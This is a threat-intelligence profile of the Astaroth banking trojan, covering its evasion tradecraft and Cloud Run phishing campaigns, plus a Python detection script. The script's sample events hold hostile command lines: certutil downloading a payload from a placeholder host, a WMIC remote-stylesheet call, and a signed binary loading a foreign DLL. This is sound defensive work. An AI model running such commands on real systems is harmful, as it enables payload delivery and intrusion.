Astaroth

Malware Profile Updated 3 months ago
Astaroth, also tracked as Guildma, is an information-stealing banking trojan notable for its evasion techniques. It reaches victims through phishing emails and malicious downloads or websites, usually without the user noticing, and once running it harvests credentials and other personal data.

The Astaroth campaign abuses Avast's aswrundll.exe process so that its code runs under a trusted, signed binary, and bundles an external tool, NetPass, to recover additional stored passwords. Earlier versions of the campaign used certutil to download files, so the change in download mechanism points to ongoing evolution of the operators' tooling.

Cisco Talos researchers have warned of a surge in email phishing campaigns that abuse the Google Cloud Run service to deliver banking trojans including Astaroth, Mekotio and Ousaban. The attacks, observed since September 2023, have targeted victims in Latin America and Europe, with the highest-volume campaigns aimed at Latin America. Mekotio, delivered in the later stages of Astaroth attacks, enables browser manipulation and the theft of banking credentials and personal data. The misuse of a legitimate cloud service as the distribution channel for these high-volume campaigns is particularly concerning.

The latest Astaroth variant has targeted more than 300 financial institutions across 15 Latin American countries, making it one of the most widespread banking-trojan campaigns in recent years. The scale and sophistication of these attacks underscore the need for detection that keys on the abused tooling rather than on the malware binaries alone.
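As an added example (not Astaroth's code and not detection content from any vendor cited on this page), the following Python runs three heuristic checks matching the tradecraft named above over constructed Sysmon-style process-creation events: certutil fetching a URL with -urlcache, Avast's aswrundll.exe being pointed at a DLL outside the Avast install directory, and WMIC applying a remote XSL stylesheet. The WMIC check is included because the reference list names a WMIC-based Astaroth variant; the /format: remote-stylesheet pattern is a general living-off-the-land heuristic, not a detail taken from this page. The log format, hostnames, paths, the Avast install directory used as the allow-listed location, and the Cloud Run hostname note (*.run.app) are assumptions chosen for the example, not indicators from the page.

```python
import re
import shlex
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed process-creation events in a Sysmon-like key=value form. This is
# not real telemetry: hosts, paths and file names are placeholders for the example.
SAMPLE_EVENTS = [
    # Stager pulling a payload with certutil from a Cloud Run hostname.
    r'Image=C:\Windows\System32\certutil.exe|ParentImage=C:\Windows\System32\wbem\WMIC.exe|CommandLine=certutil -urlcache -split -f https://stage-example.run.app/pkg.bin C:\Users\Public\pkg.bin',
    # Avast's signed runtime loader pointed at a DLL outside the Avast install directory.
    r'Image=C:\Program Files\Avast Software\Avast\aswrundll.exe|ParentImage=C:\Windows\System32\wbem\WMIC.exe|CommandLine="C:\Program Files\Avast Software\Avast\aswrundll.exe" C:\Users\Public\Libraries\r1.dll',
    # WMIC told to render its output through a remote XSL stylesheet.
    r'Image=C:\Windows\System32\wbem\WMIC.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=wmic os get /format:"https://stage-example.run.app/x.xsl"',
    # Benign: certutil hashing a file, no URL involved.
    r'Image=C:\Windows\System32\certutil.exe|ParentImage=C:\Windows\System32\cmd.exe|CommandLine=certutil -hashfile C:\Users\Public\pkg.bin SHA256',
    # Benign: aswrundll.exe loading a DLL from its own install directory.
    r'Image=C:\Program Files\Avast Software\Avast\aswrundll.exe|ParentImage=C:\Program Files\Avast Software\Avast\AvastSvc.exe|CommandLine="C:\Program Files\Avast Software\Avast\aswrundll.exe" "C:\Program Files\Avast Software\Avast\defs\aswdefs.dll"',
]

# Assumed default install directory (lower-cased); adjust to the environment.
AVAST_DIR = "c:\\program files\\avast software\\"
URL_RE = re.compile(r"https?://([^/\s\"']+)", re.IGNORECASE)


@dataclass
class Finding:
    rule: str
    image: str
    detail: str


def parse_event(line: str) -> Dict[str, str]:
    """Parse one 'Key=Value|Key=Value' line into a dict (the constructed log format)."""
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def split_cmd(cmd: str) -> List[str]:
    """Windows-style tokenisation: quoted paths stay whole, backslashes are literal."""
    try:
        return [t.strip('"') for t in shlex.split(cmd, posix=False)]
    except ValueError:  # unbalanced quotes: fall back to a whitespace split
        return cmd.split()


def check_certutil_download(ev: Dict[str, str]) -> Optional[Finding]:
    """certutil -urlcache ... <URL>: the download primitive earlier Astaroth variants used."""
    if basename(ev.get("Image", "")) != "certutil.exe":
        return None
    toks = split_cmd(ev.get("CommandLine", ""))
    if not {"-urlcache", "/urlcache"} & {t.lower() for t in toks}:
        return None
    url = next((t for t in toks if URL_RE.match(t)), None)
    if url is None:
        return None
    host = URL_RE.match(url).group(1)
    note = " (Cloud Run hostname)" if host.lower().endswith(".run.app") else ""
    return Finding("certutil_download", ev["Image"], f"downloads from {host}{note}")


def check_aswrundll_foreign_dll(ev: Dict[str, str]) -> Optional[Finding]:
    """aswrundll.exe asked to load a DLL from outside the (assumed) Avast directory."""
    if basename(ev.get("Image", "")) != "aswrundll.exe":
        return None
    for t in split_cmd(ev.get("CommandLine", "")):
        if t.lower().endswith(".dll") and not t.lower().startswith(AVAST_DIR):
            return Finding("aswrundll_foreign_dll", ev["Image"], f"loads {t}")
    return None


def check_wmic_remote_xsl(ev: Dict[str, str]) -> Optional[Finding]:
    """wmic ... /format:<URL>: remote stylesheet execution through a trusted binary."""
    if basename(ev.get("Image", "")) != "wmic.exe":
        return None
    for t in split_cmd(ev.get("CommandLine", "")):
        if t.lower().startswith("/format:") and "://" in t:
            target = t[len("/format:"):].strip('"')
            return Finding("wmic_remote_xsl", ev["Image"], f"applies {target}")
    return None


CHECKS = [check_certutil_download, check_aswrundll_foreign_dll, check_wmic_remote_xsl]


def run_detections(lines: List[str]) -> List[Finding]:
    """Run every check over every event; returns findings in event order."""
    findings: List[Finding] = []
    for line in lines:
        ev = parse_event(line)
        findings.extend(f for f in (chk(ev) for chk in CHECKS) if f is not None)
    return findings


if __name__ == "__main__":
    for f in run_detections(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.image}: {f.detail}")
```

The point of the aswrundll check is that the signed Avast binary itself is not the indicator; the source of the DLL it is told to load is. In a real deployment, feed actual Sysmon event 1 records, set AVAST_DIR from the installed product, and treat the Cloud Run note as enrichment rather than a verdict, since legitimate software also downloads from that service.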
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.
ID: Guildma | Votes: 1
Guildma is a malicious software (malware) that has been operational since at least 2015, initially targeting banking users exclusively from Brazil. Over time, this malware, alongside others such as Javali, Melcoz, and Grandoreiro, expanded its operations to target banks in other countries including
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Malware
Google
Cisco
Trojan
Phishing
Evasive
Exploit
Antivirus
Talos
Europe
Banking
Payload
Avast
Windows
Cybereason
Malware Payl...
Spam
Associated Malware
ID: Ousaban | Type: Unspecified | Votes: 2
Ousaban is a malicious software, or malware, specifically a banking trojan developed primarily in Delphi. This harmful program is designed to exploit and damage computer systems, often infiltrating them via suspicious downloads, emails, or websites without the user's knowledge. Once inside, Ousaban
ID: Mekotio | Type: Unspecified | Votes: 1
Mekotio is a sophisticated and persistent banking trojan that has primarily targeted Latin American countries since at least 2015. This malware, designed to exploit and damage computer systems, typically spreads through phishing emails that employ social engineering tactics. Once inside a system, Me
ID: Javali | Type: Unspecified | Votes: 1
Javali is a multistage malware that has been active since November 2017, primarily targeting customers of financial institutions in Portuguese- and Spanish-speaking countries, with a particular focus on Brazil and Mexico. Part of a group of banking trojans including Guildma, Melcoz, and Grandoreiro,
Associated Threat Actors
No associations to display
Associated Vulnerabilities
No associations to display
Source Document References
Information about the Astaroth malware was read from the documents listed below (display limited to 20 results).
Source | Created | Title
CERT-EU | 5 months ago | Google Cloud Run Abused in Massive Banking Trojan Operation
CERT-EU | 5 months ago | Banking Trojans Target Latin America and Europe Through Google Cloud Run
CERT-EU | 5 months ago | High-volume malware campaigns involve Google Cloud Run exploitation
CERT-EU | 5 months ago | TikTok's latest actions to combat misinformation shows it's not just a U.S. problem
CERT-EU | 5 months ago | Hackers abuse Google Cloud Run in massive banking trojan campaign
DARKReading | 5 months ago | Google's Cloud Run Service Spreads Several Bank Trojans
CERT-EU | a year ago | InfoSec Handlers Diary Blog - SANS Internet Storm Center
Unit42 | 7 months ago | From DarkGate to AsyncRAT: Malware Detected and Shared As Unit 42 Timely Threat Intelligence
MITRE | a year ago | Astaroth Malware Uses Legitimate OS and Antivirus Processes to Steal Passwords and Personal Data
MITRE | a year ago | Seeing a Resurgence of Demonic Astaroth WMIC Trojan | Cofense